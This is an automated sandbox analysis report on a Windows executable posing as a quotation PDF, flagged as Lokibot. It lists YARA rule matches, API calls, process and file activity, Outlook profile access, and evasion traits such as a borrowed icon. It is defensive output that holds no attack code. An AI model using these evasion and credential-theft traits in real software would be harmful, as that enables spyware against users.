              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0040604C
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00404772
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_0040549C
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_004029D4
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: String function: 00405B6F appears 42 times
              Source: Cotizaci#U00f3npdf.exe, 00000000.00000003.247002262.0000000003196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3npdf.exe
              Source: Cotizaci#U00f3npdf.exe, 00000000.00000003.242779199.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3npdf.exe
              Source: Cotizaci#U00f3npdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Cotizaci#U00f3npdf.exeVirustotal: Detection: 25%
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeJump to behavior
              Source: Cotizaci#U00f3npdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsc114E.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@59/2
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_73321000 push eax; ret
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
